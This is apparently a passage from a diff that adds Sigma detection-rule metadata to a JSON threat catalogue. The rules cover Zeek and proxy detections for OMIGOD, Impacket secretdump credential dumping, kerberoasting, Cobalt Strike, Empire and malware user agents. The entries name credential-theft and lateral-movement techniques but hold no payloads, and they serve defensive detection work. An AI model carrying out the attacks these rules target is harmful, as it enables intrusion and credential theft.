"https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://twitter.com/neu5ron/status/1438987292971053057?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.lateral_movement", + "attack.t1068", + "attack.t1190", + "attack.t1203", + "attack.t1021.006", + "attack.t1210" + ], + "creation_date": "2021/09/20", + "filename": "zeek_http_omigod_no_auth_rce.yml", + "author": "Nate Guagenti (neu5ron)", + "level": "high", + "falsepositive": [ + "Exploits that were attempted but unsuccessful.", + "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", + "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", + "value": "WebDav Put Request", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2020/05/02", + "filename": "zeek_http_webdav_put_request.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", + "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", + "value": "Publicly Accessible RDP Service", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1021/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" + ], + "tags": [ + "attack.t1021.001" + ], + "creation_date": "2020/08/22", + "filename": "zeek_rdp_public_listener.yml", + "author": "Josh Brower @DefensiveDepth", + "level": "high", + "falsepositive": [ + "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", + "value": "Remote Task Creation via ATSVC Named Pipe - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ], + "creation_date": "2020/04/03", + "filename": "zeek_smb_converted_win_atsvc_task.yml", + "author": "Samir Bousseaden, @neu5rn", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", + "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", + "value": "Possible Impacket SecretDump Remote Activity - Zeek", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ], + "creation_date": "2020/03/19", + "filename": "zeek_smb_converted_win_impacket_secretdump.yml", + "author": "Samir Bousseaden, @neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", + "value": "First Time Seen Remote Named Pipe - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/04/02", + "filename": "zeek_smb_converted_win_lm_namedpipe.yml", + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "level": "high", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", + "value": "Suspicious PsExec Execution - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/04/02", + "filename": "zeek_smb_converted_win_susp_psexec.yml", + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects known sensitive file extensions via Zeek", + "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", + "value": "Suspicious Access to Sensitive File Extensions - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection" + ], + "creation_date": "2020/04/02", + "filename": "zeek_smb_converted_win_susp_raccess_sensitive_fext.yml", + "author": "Samir Bousseaden, @neu5ron", + "level": "medium", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", + "value": "Transferring Files with Credential Data via Network Shares - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ], + "creation_date": "2020/04/02", + "filename": "zeek_smb_converted_win_transferring_files_with_credential_data.yml", + "author": "@neu5ron, Teymur Kheirkhabarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", + "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", + "value": "Kerberos Network Traffic RC4 Ticket Encryption", + "meta": { + "refs": [ + "https://adsecurity.org/?p=3458", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2020/02/12", + "filename": "zeek_susp_kerberos_rc4.yml", + "author": "sigma", + "level": "medium", + "falsepositive": [ + "Normal enterprise SPN requests activity" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", + "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", + "value": "Advanced IP/Port Scanner Update Check", + "meta": { + "refs": [ + "https://www.advanced-ip-scanner.com/", + "https://www.advanced-port-scanner.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1590" + ], + "creation_date": "2022/08/14", + "filename": "proxy_adv_ip_port_scanner_upd_check.yml", + "author": "Axel Olsson", + "level": "medium", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent string of APT40 Dropbox tool", + "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", + "value": "APT40 Dropbox Tool User Agent", + "meta": { + "refs": [ + "Internal research from Florian Roth", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2019/11/12", + "filename": "proxy_apt40.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Old browsers" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", + "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", + "value": "Domestic Kitten FurBall Malware Pattern", + "meta": { + "refs": [ + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2021/02/08", + "filename": "proxy_apt_domestic_kitten.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Baby Shark C2 Framework communication patterns", + "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", + "value": "BabyShark Agent Pattern", + "meta": { + "refs": [ + "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2021/06/09", + "filename": "proxy_baby_shark.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects HTTP requests used by Chafer malware", + "uuid": "fb502828-2db0-438e-93e6-801c7548686d", + "value": "Chafer Malware URL Pattern", + "meta": { + "refs": [ + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/01/31", + "filename": "proxy_chafer_malware.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Malleable Amazon Profile", + "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", + "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile", + "meta": { + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/11/12", + "filename": "proxy_cobalt_amazon.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", + "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", + "value": "CobaltStrike Malformed UAs in Malleable Profiles", + "meta": { + "refs": [ + "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2021/05/06", + "filename": "proxy_cobalt_malformed_uas.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", + "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", + "value": "CobaltStrike Malleable (OCSP) Profile", + "meta": { + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/11/12", + "filename": "proxy_cobalt_ocsp.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Malleable OneDrive Profile", + "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", + "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile", + "meta": { + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/11/12", + "filename": "proxy_cobalt_onedrive.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects WebDav DownloadCradle", + "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", + "value": "Windows WebDAV User Agent", + "meta": { + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2018/04/06", + "filename": "proxy_downloadcradle_webdav.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents", + "Legitimate WebDAV administration" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", + "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", + "value": "Download from Suspicious Dyndns Hosts", + "meta": { + "refs": [ + "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1105", + "attack.t1568" + ], + "creation_date": "2017/11/08", + "filename": "proxy_download_susp_dyndns.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Software downloads" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects download of certain file types from hosts in suspicious TLDs", + "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", + "value": "Download from Suspicious TLD", + "meta": { + "refs": [ + "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", + "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.spamhaus.org/statistics/tlds/", + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ], + "creation_date": "2017/11/07", + "filename": "proxy_download_susp_tlds_blacklist.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "All kinds of software downloads" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects executable downloads from suspicious remote systems", + "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", + "value": "Download EXE from Suspicious TLD", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ], + "creation_date": "2017/03/13", + "filename": "proxy_download_susp_tlds_whitelist.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "All kind of software downloads" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects user agent and URI paths used by empire agents", + "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", + "value": "Empire UserAgent URI Combo", + "meta": { + "refs": [ + "https://github.com/BC-SECURITY/Empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2020/07/13", + "filename": "proxy_empire_ua_uri_combos.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Valid requests with this exact user agent to server scripts of the defined names" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious empty user agent strings in proxy logs", + "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", + "value": "Empty User Agent", + "meta": { + "refs": [ + "https://twitter.com/Carlos_Perez/status/883455096645931008", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/07/08", + "filename": "proxy_empty_ua.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects URL pattern used by iOS Implant", + "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", + "value": "iOS Implant URL Pattern", + "meta": { + "refs": [ + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "https://twitter.com/craiu/status/1167358457344925696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.collection", + "attack.t1005", + "attack.t1119", + "attack.credential_access", + "attack.t1528", + "attack.t1552.001" + ], + "creation_date": "2019/08/30", + "filename": "proxy_ios_implant.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", + "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", + "value": "Java Class Proxy Download", + "meta": { + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" + ], + "tags": [ + "attack.initial_access" + ], + "creation_date": "2021/12/21", + "filename": "proxy_java_class_download.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Windows PowerShell Web Access", + "uuid": "c8557060-9221-4448-8794-96320e6f3e74", + "value": "Windows PowerShell User Agent", + "meta": { + "refs": [ + "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/03/13", + "filename": "proxy_powershell_ua.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", + "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", + "value": "PwnDrp Access", + "meta": { + "refs": [ + "https://breakdev.org/pwndrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003" + ], + "creation_date": "2020/04/15", + "filename": "proxy_pwndrop.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", + "value": "Raw Paste Service Access", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/domain/paste.ee/relations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003", + "attack.defense_evasion" + ], + "creation_date": "2019/12/05", + "filename": "proxy_raw_paste_service_access.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a flashplayer update from an unofficial location", + "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", + "value": "Flash Player Update from Suspicious Location", + "meta": { + "refs": [ + "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189", + "attack.execution", + "attack.t1204.002", + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2017/10/25", + "filename": "proxy_susp_flash_download_loc.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown flash download locations" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", + "uuid": "b494b165-6634-483d-8c47-2026a6c52372", + "value": "Telegram API Access", + "meta": { + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.002" + ], + "creation_date": "2018/06/05", + "filename": "proxy_telegram_api.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Turla ComRAT patterns", + "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", + "value": "Turla ComRAT", + "meta": { + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.g0010" + ], + "creation_date": "2020/05/26", + "filename": "proxy_turla_comrat.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings used in APT malware in proxy logs", + "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", + "value": "APT User Agent", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/11/12", + "filename": "proxy_ua_apt.yml", + "author": "Florian Roth, Markus Neis", + "level": "high", + "falsepositive": [ + "Old browsers" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", + "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", + "value": "Bitsadmin to Uncommon IP Server Address", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ], + "creation_date": "2022/06/10", + "filename": "proxy_ua_bitsadmin_susp_ip.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Bitsadmin connections to domains with uncommon TLDs", + "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", + "value": "Bitsadmin to Uncommon TLD", + "meta": { + "refs": [ + "https://twitter.com/jhencinski/status/1102695118455349248", + "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ], + "creation_date": "2019/03/07", + "filename": "proxy_ua_bitsadmin_susp_tld.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", + "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", + "value": "Crypto Miner User Agent", + "meta": { + "refs": [ + "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", + "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/10/21", + "filename": "proxy_ua_cryptominer.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", + "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", + "value": "Exploit Framework User Agent", + "meta": { + "refs": [ + "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/07/08", + "filename": "proxy_ua_frameworks.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings user by hack tools in proxy logs", + "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", + "value": "Hack Tool User Agent", + "meta": { + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2017/07/08", + "filename": "proxy_ua_hacktool.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings used by malware in proxy logs", + "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", + "value": "Malware User Agent", + "meta": { + "refs": [ + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "https://perishablepress.com/blacklist/ua-2013.txt", + 